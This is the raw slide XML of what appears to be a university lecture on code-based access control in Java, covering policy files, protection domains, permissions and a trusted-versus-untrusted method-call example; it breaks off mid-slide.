                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{178AAD92-8C5E-82F0-5C80-216FCBF96D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4C624527-2F65-42CA-8411-EA79FC377E67}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>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70900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337B0151-CDBF-9A9A-AA67-CEF52E330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  Code-based access control in Java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4205962A-802C-7E34-78D9-5D07DAEC1F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6AFE4D3D-B588-4391-B66E-B4F1CD072FDF}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41988" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12582D0C-BC7E-D56B-4998-0DBDF4D2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1258888"/>
            <a:ext cx="885190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800" tIns="41400" rIns="82800" bIns="414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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> configuration file  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>that expresses a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>policy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sz="2000">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204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sz="16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grant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en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>codebase "http://www.cs.ru.nl/ds", signedBy "Radboud",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 { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>permission</a:t>
            </a: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    java.io.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FilePermission</a:t>
            </a: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"/home/ds/erik","read";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 };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sz="20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grant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en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>codebase "file:/.*"</a:t>
            </a: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 { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>permission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    java.io.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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FilePermission</a:t>
            </a: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"/home/ds/erik","write";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 }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b="1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1989" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78789075-02BC-FEC4-8E53-8A3BBFF59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3802063"/>
            <a:ext cx="2590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>
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>protection domains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41990" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D5B3A9A-A05C-59F2-6B37-0535B6BC6B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3688" y="4037013"/>
            <a:ext cx="2870200" cy="168275"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="3333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1" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EC16903-D899-47A0-F7DC-676C48828FD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68938" y="2667000"/>
            <a:ext cx="1758950" cy="1223963"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="3333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A037EC04-671E-7064-E489-1BB936C84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/>
              <a:t>Protection domains</a:t>
            </a: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35361485-5E1A-CBAE-88C9-0536D00202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Protection domains based on evidence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GB" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Where did it come from?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:t> where on the local file system (hard disk) or where on the internet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GB" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Was it digitally signed and if so by who?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t> using a standard PKI</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-GB" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US"/>
              <a:t>When loading a component, the Virtual Machine (VM) consults the security policy and remembers the permissions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8CA1C8BB-F947-B226-6F84-5CB4891E4A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CE5A0C83-BC23-4941-BFF4-76C130A2221C}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BE25724-6851-1FFF-537B-5E7C8CE6B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/>
              <a:t>Permissions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825603A3-FB1B-B885-B197-ED0A7C20C3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nl-NL"/>
              <a:t>Permissions represent a right to perform some actions.                       Examples:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" b="1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FilePermission(name, mode) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" b="1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NetworkPermission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" b="1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WindowPermission</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Permissions have a set semantics, so one permission can be a superset of another one.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>E.g.          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FilePermission("*", "read")                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>includes    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FilePermission("some_file.txt", "read")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" altLang="nl-NL"/>
              <a:t>‏</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL"/>
              <a:t>Developers can define new custom permissions.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48541002-8658-6E2A-BA5E-EDC74A392A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24B13100-74C4-4434-901A-211D887598DC}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="2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7F8808A3-577E-62D2-4047-B44B8948E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  Last week: code-based access control in Java</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48131" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17332931-CF61-912E-1935-0E678A1C06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1E78309A-3A40-4A3C-A05A-5398F726C279}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" sz="1400" smtClean="0"/>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="93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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48132" name="Text Box 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6254D07B-6C38-22A5-3391-A7E035381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1258888"/>
            <a:ext cx="885190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800" tIns="41400" rIns="82800" bIns="414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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> configuration file  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>that expresses a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>policy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sz="2000">
              <a:solidFill>
                <a:srgbClr val="3333CC"/>
              </a:solidFill>
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204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sz="16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grant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en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>codebase "http://www.cs.ru.nl/ds", signedBy "Radboud",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 { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>permission</a:t>
            </a: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    java.io.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FilePermission</a:t>
            </a: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"/home/ds/erik","read";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 };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sz="20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grant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en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>codebase "file:/.*"</a:t>
            </a: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 { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>permission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    java.io.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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FilePermission</a:t>
            </a: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"/home/ds/erik","write";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 }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b="1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8133" name="Text Box 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EB9C948-AB0D-4239-2693-3ACEA8A07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3802063"/>
            <a:ext cx="2590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>
                <a:solidFill>
                  <a:srgbClr val="3333CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>protection domains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48134" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B268BF64-D52D-6034-6B49-1145283D6C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3688" y="4037013"/>
            <a:ext cx="2870200" cy="168275"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="3333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35" name="Line 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D68216BC-59C3-1542-B416-D53144DA44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68938" y="2667000"/>
            <a:ext cx="1758950" cy="1223963"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12600">
            <a:solidFill>
              <a:srgbClr val="3333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AFEAF71-66F9-07B4-C128-1D893D6DB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12077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nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="50179" name="Group 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA72401B-D7D8-4EF6-C35E-5214B6A05E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1439863" y="1708150"/>
            <a:ext cx="7529512" cy="5106988"/>
            <a:chOff x="1397000" y="2136775"/>
            <a:chExt cx="7572375" cy="5106988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50183" name="Picture 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD469E89-7C09-6F30-4117-4B90363B8C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813" y="6637338"/>
              <a:ext cx="928687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0184" name="Picture 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{447377F1-4486-4D0B-652B-EBC19D806E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563" y="5780088"/>
              <a:ext cx="47942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0185" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{922260F7-9513-1772-BFB8-02E266850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188" y="5708650"/>
              <a:ext cx="7215187" cy="785813"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1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5000" rIns="90000" bIns="45000" anchor="ctr" anchorCtr="1"/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/>
                <a:t>                                                                 Virtual Machine</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50186" name="Picture 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E5A35E4-FA9F-8F7D-17AC-8F066A7FD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563" y="5994400"/>
              <a:ext cx="357187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7" name="AutoShape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{883B031C-86A4-57A6-98CB-3E81AB960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000" y="2136775"/>
              <a:ext cx="3714750" cy="3000375"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1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package trusted;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class Trusted { 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       void m1 ()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         { ....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           System.delete file;    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         }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}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50188" name="AutoShape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91E62056-9D06-7D51-D8EE-D0BF54908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6063" y="2136775"/>
              <a:ext cx="3643312" cy="3000375"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1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package evil;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class Bad {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   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   void f1 ()  { System.delete file; }          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  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              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}  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="nl-NL"/>
                <a:t>            </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50189" name="Freeform 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1319025B-8382-2C96-DD53-E860D6758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0" y="3848423"/>
              <a:ext cx="1652058" cy="2503166"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
                <a:gd name="T1" fmla="*/ 0 h 4065"/>
                <a:gd name="T2" fmla="*/ 0 w 1229"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
                <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                <a:gd name="T6" fmla="*/ 0 w 1229"/>
                <a:gd name="T7" fmla="*/ 0 h 4065"/>
                <a:gd name="T8" fmla="*/ 1229 w 1229"/>
                <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                  <a:moveTo>
                    <a:pt x="1228" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4064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50190" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AC92560-30E5-4811-C48C-2E34DE99F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313" y="5922963"/>
              <a:ext cx="500062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1" name="Picture 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5E326B9-0EFD-D340-1652-210E1A0AC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388" y="4208462"/>
              <a:ext cx="362092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2" name="Picture 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4482F0F2-7AE2-F305-99CE-5430D74DD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889" y="4064446"/>
              <a:ext cx="289674" cy="28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3" name="Freeform 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59767302-1D78-2C50-4E92-5BB2CB5753D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5504" y="4208462"/>
              <a:ext cx="651931" cy="2571751"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2147483646 w 1229"/>
                <a:gd name="T1" fmla="*/ 0 h 4065"/>
                <a:gd name="T2" fmla="*/ 0 w 1229"/>
                <a:gd name="T3" fmla="*/ 2147483646 h 4065"/>
                <a:gd name="T4" fmla="*/ 0 60000 65536"/>
                <a:gd name="T5" fmla="*/ 0 60000 65536"/>
                <a:gd name="T6" fmla="*/ 0 w 1229"/>
                <a:gd name="T7" fmla="*/ 0 h 4065"/>
                <a:gd name="T8" fmla="*/ 1229 w 1229"/>
                <a:gd name="T9" fmla="*/ 4065 h 40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29" h="4065">
                  <a:moveTo>
                    <a:pt x="1228" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4064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50180" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84BDEFEA-ED1A-D073-9078-9E93687AD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1779588"/>
            <a:ext cx="666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181" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE5F31C-39A6-7791-466A-AA48BF5E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1779588"/>
            <a:ext cx="660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2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A9EC6B9-1252-3F60-6142-001D3EE723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8E35EB61-CF29-46F7-92A7-92DCF825F163}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL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C35C269-4B75-75F7-B0CB-4F8B0A10B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nl-NL"/>
              <a:t>Complication: methods calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8150F51A-BA0E-249E-7930-4B35F93C4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DE84D06F-0C56-4F81-A2CC-4CFF6BAE3A95}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52228" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9FC42A6-BAC2-8B31-F63B-D114B2EA6268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1397000" y="1708150"/>
            <a:ext cx="7572375" cy="5535613"/>
            <a:chOff x="1397000" y="2136775"/>
            <a:chExt cx="7572375" cy="5106988"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52231" name="Picture 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{242D18E0-68E5-4C6E-BDFF-AD4281EB2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563" y="5780088"/>
              <a:ext cx="47942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2232" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3464542-AC75-AB61-B263-1864DB0B2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188" y="5708650"/>
              <a:ext cx="7215187" cy="785813"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1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5000" rIns="90000" bIns="45000" anchor="ctr" anchorCtr="1"/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/>
                <a:t>                                                                Virtual Machine</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52233" name="AutoShape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18B2B1E0-3019-12A0-A71F-399E92593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000" y="2136775"/>
              <a:ext cx="3714750" cy="2857500"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1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package trusted;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class Trusted { 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       void m1 ()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         { ....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           System.delete file;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         }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}</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52234" name="AutoShape 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AA10BE-8F22-60EA-A21D-E2B09AE8A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6063" y="2136775"/>
              <a:ext cx="3643312" cy="3040626"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 1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package evil;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class Bad {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   Trusted t;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   void f1 ()  { System.delete file; }          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>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:endParaRP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   void f2()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         { </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="nl-NL">
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>t.m1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="nl-NL">
